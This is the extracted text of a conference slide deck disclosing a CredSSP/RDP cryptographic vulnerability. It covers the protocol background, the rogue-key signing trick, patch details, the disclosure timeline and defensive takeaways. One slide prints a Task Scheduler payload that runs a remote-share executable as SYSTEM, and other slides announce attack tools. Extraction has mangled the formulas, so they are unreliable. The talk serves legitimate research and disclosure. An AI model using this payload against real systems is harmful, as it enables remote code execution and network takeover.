Download - Server Tailgating – A Chosen-
![Page 1: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/1.jpg)
![Page 2: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/2.jpg)
ServerTailgating– AChosen-PlaintextAttackonRDP
- Eyal Karni- YaronZinar- RomanBlachman
![Page 3: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/3.jpg)
Speaker InfoEyal Karni• Security Researcher @ Preempt
Yaron Zinar• Lead Security Researcher @ Preempt
Roman Blachman• Co-founder and CTO @ Preempt
Previous Work• CVE 2017-8563 (LDAPS NTLM-Relay)• Microsoft Security Advisory 4056318
![Page 4: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/4.jpg)
• Introduction• Technical Background• The Vulnerability• Demo• Port-Mortem
Agenda
![Page 5: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/5.jpg)
Introduction
![Page 6: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/6.jpg)
What We Will Show
•A Logical (Cryptographic!) Vulnerability
•High Impact• Affecting All Windows Versions• Making RDP (Remote Desktop) Vulnerable
•Not fully patched
![Page 7: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/7.jpg)
Attackers Move Laterally…
https://docs.microsoft.com/en-us/advanced-threat-analytics/ata-threats
![Page 8: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/8.jpg)
Technical Background
![Page 9: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/9.jpg)
Kerberos
• DevelopedbyMIT
• DefaultAuthenticationsinceWindows2000
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc772815(v=ws.10)
![Page 10: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/10.jpg)
MSRPC – Microsoft Remote Procedure Call
• Used to expose remote interfaces to machines for calling from remote machines
• Used in remote management scenarios• PSexec• WMI
• No developer wants to dive into this (Everyone uses RESTful stuff)
![Page 11: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/11.jpg)
• SSPI is an API that allows application to add authenticity and privacy almost transparently.
• Applicable to any application that allows “Windows Authentication”
GSSAPI / SSPI
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc772815(v=ws.10)
![Page 12: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/12.jpg)
TLS (Transport Layer Security)
• Usedfortrafficencryption
• De-factostandardforencryption• Web• VoIP• …
• Serveridentityverifiedviacertificate(RSA)
![Page 13: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/13.jpg)
CredSSP
• An MS protocol to facilitate secure credential forwarding
•Mutual authentication
•CredSSP protocol flow•Double encryption using
TLS/GSS-API•Uses a technique “Channel
Binding”https://technet.microsoft.com/en-us/library/hh921957.aspx
![Page 14: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/14.jpg)
RDP (Remote Desktop Protocol)
•RDPSecurity• Full– NLA(NetworkLevelAuthentication)+TLS• TLSonly• Nosecurity
•RDPrestricted-admin• UsuallyinRDPwehavenetworklogin+interactivelogin• RDPrestrictedadminincludesonlynetworklogin(single-sign-on)
![Page 15: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/15.jpg)
RDP Flow
• TLSisEstablished
• NLA iscarriedoutusing CredSSP
• CertificateValidation
• Theusersendsitspasswordover CredSSP
• SessionEstablished– nowUIstuff
![Page 16: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/16.jpg)
RDP – Certificate Validation
IfKerberos:• Therewillbenotvalidation
IfNTLM:•Certificatewillbevalidated• CAserver• Certificatepinning
![Page 17: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/17.jpg)
Protocols Recap
RDP
TLS
CredSSP
Kerberos NTLM
MSRPC
Kerberos NTLM
![Page 18: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/18.jpg)
The Vulnerability
![Page 19: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/19.jpg)
The Journey
LookingforNTLMflaws• DiscoverCVE-2017-8563• TriedenablingNTLM-RelaywithMiTM only• Foundissue#1– certificatecheckonlyafterNLA
![Page 20: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/20.jpg)
The Journey
•BeganresearchingCredSSP• Foundissue#2
![Page 21: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/21.jpg)
Do You See the Issue?
![Page 22: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/22.jpg)
Idea
The public key is encrypted and signed as if it were an application data.
Well, why could it be a valid application data?
![Page 23: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/23.jpg)
(RDP)SessionInitiation
(TLS)RougeCertificate
(CredSSP)GSS_WrapEx(RougeCert) (MSRPC)GSS_WrapEx(TaskSch)
Vulnerability Flow Chart
KerberosU2UNegotiation
![Page 24: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/24.jpg)
Can we use any Public Key?
•The public key doesn't get verified
•The public key should still be valid in the TLS session
•But it should be a valid as a RSA key.• Is this possible?
![Page 25: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/25.jpg)
RSA Quick Overview
•A Public Key Encryption Scheme
• Public key – (N,e)• Private key – d
•Safe assuming hardness of prime factorization
https://www.tutorialspoint.com/cryptography/public_key_encryption.htm
![Page 26: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/26.jpg)
RSA Quick Overview
𝑁 = 𝑝𝑞𝜑 𝑁 = 𝑝 − 1 𝑞 − 1
e = 𝑑)*𝑚𝑜𝑑𝜑(𝑁)
𝑚0 = 𝑐(𝑚𝑜𝑑𝑁)
original message Public exponent Public modulus
encrypted message
![Page 27: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/27.jpg)
“Broken” RSA
𝑁 = 𝑝𝜑 𝑁 = 𝑝 − 1
e = 𝑑)*𝑚𝑜𝑑𝜑(𝑁)
𝑚0 = 𝑐(𝑚𝑜𝑑𝑁)
original message Public exponent Public modulus
encrypted message
![Page 28: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/28.jpg)
“Broken” RSA
𝑁 = 𝑝𝜑 𝑁 = 𝑝 − 1
e = 𝑑)*𝑚𝑜𝑑𝜑(𝑁)
𝑐0 = 𝑚(𝑚𝑜𝑑𝑁)
encrypted message Public exponent Public modulus
original message
![Page 29: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/29.jpg)
Is it easy to find a prime?
•PrimeNumberTheorem:
•Wewanttosign~600bytesofdata• Expectednumberofiterationtofindaprime:ln(256788) ≈3327• Onlyneed2bytesoffreedom inthepacket(𝑙𝑜𝑔>?7ln(256788) ≈1.463)
𝑃(𝑔𝑒𝑡𝑎𝑝𝑟𝑖𝑚𝑒𝑖𝑛𝑟𝑎𝑛𝑑𝑜𝑚) ≈ G(H)H≈ *IJH
![Page 30: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/30.jpg)
Obstacle Passed
![Page 31: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/31.jpg)
Requirement For Public Key • HowistheX.509certificaterepresented?ASN.1
PublicKeyStructure
Tag
ASN.1Sequence ControlledUncontrolled
0x30 0x82 0x01 0x0A 0x02 0x82 0x01 0x01 …
0 1 2 3 4 5 6 7 … 8+len(N) 9+len(N) 10+len(N) …
LengthTag Length LengthTag
ASN.1Field(N) ASN.1Field(e)
N e
![Page 32: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/32.jpg)
Finding A Suitable Protocol
•Supports SSPI•Encoding requirements• Application Data is Non-ASN.1• Specific 8-bytes Prefix which we have no control over• Includes some degree of freedom
•Able to do harm with a single signed packet•Available on wide variety of machines
![Page 33: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/33.jpg)
• Supports SPNEGO• Encoding requirements• Application Data is Non-ASN.1• Specific 8-bytes Prefix which we have no control over• Includes some degree of freedom
• Able to do harm with a single signed packet• Available on wide variety of machines
ItisactuallyMIDL
MSRPC!
![Page 34: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/34.jpg)
#1 Try – Exploiting NTLM
signaturescope
encryptionscope
![Page 35: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/35.jpg)
#1 Try – Exploiting NTLM
• SupportsSPNEGO• EncodingRequirements• Applicationdataisnon-ASN.1• Specific8-bytesPrefixwhichwehavenocontrolover• Includessomedegreeoffreedom• Signaturescope(noheader!)
• Abletodoharmwithasinglepacket• Availableonawidevarietyofmachines
AbilitytodoNTLMRelayMuchStronger!
![Page 36: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/36.jpg)
#2 Try – Exploiting Kerberos
signaturescope
encryptionscope
![Page 37: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/37.jpg)
Exploit Details
•MIDLRequirements• Firstelementisstring• ApparentlyMSRPCignorestheendofthedata(soitischosenasfreedom)
•WeencodeaTaskRegistrationcommand• Forimmediateexecution• Thepayloadisinashare
path: u'aa\x00'xml: u'<?xml version="1.0"?><Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><Triggers><RegistrationTrigger/></Triggers><Actions><Exec><Command>\\\\IP\\share\\executable.exe</Command></Exec></Actions></Task>\x00'flags: 6sddl: NULLlogonType: 3cCreds: 1pCreds: [
userId: u'S-1-5-18\x00'password: NULLflags: 1, ]
![Page 38: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/38.jpg)
Success!
![Page 39: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/39.jpg)
Demo
![Page 40: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/40.jpg)
Post Mortem
![Page 41: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/41.jpg)
Should I care?
• 88.78% of desktops running Windows OS
• 95% of Fortune 500 use Active Directory
• 60% of inspected networks use RDP on a daily-basis
https://1reddrop.com/2017/02/04/windows-10-inching-along-january-2017-shows-25-3-percent-desktop-os-market-share/windows-10-market-share-of-desktop-operating-systems/
![Page 42: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/42.jpg)
Should I care?
•MiTM isarealthreat:• CVE2018-0101(CiscoASA)• ARPPoisoning• KRACK
• Easyescalationtodomainadmin• DCTraffic->DCAdmin
![Page 43: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/43.jpg)
Affected Systems
• All Windows Versions
• Affected protocols:• RDP (including restricted-admin)• WinRM
• Important – proprietary RDP clients are also affected
![Page 44: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/44.jpg)
Patch Details
•NLA Before Certificate Validation (Issue #1)• Microsoft has not addressed this issue• Recommends using Remote Credential Guard
•Malicious Certificate (Issue #2)• Protocol was modified so that the public key hash would be
signed• Added protocol negotiation – needs to be enabled by GPO• https://aka.ms/credssp
![Page 45: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/45.jpg)
Disclosure Timeline
• 2017-08-20 – Initial disclosure to MSRC• 2017-08-30 – MS repro attack and acknowledge issue• 2017-09-18 – MS requested an extension on 90 days SLA• 2018-03-12 – A patch is applied to CredSSP client/server MS
code• 2018-04-17 – MS RDP client update to include warning (tentative)• 2018-05-08 – A 2nd patch will be applied to eradicate vulnerable
CredSSP (tentative)
![Page 46: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/46.jpg)
Tools
•We’re releasing the following tools:• A malicious cert creation tool• A tool performing MiTM attack on RDP
![Page 47: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/47.jpg)
Key Takeaways
•Patching is not enough•Never sign on untrusted data•Defense-in-depth• Principle of least privilege•Network segmentation helps!•Monitor accounts usage•Reduce spread of admin credentials
![Page 48: Server Tailgating – A Chosen-](https://reader030.vdocument.in/reader030/viewer/2022012013/6158b675c1257c752a066492/html5/thumbnails/48.jpg)
Questions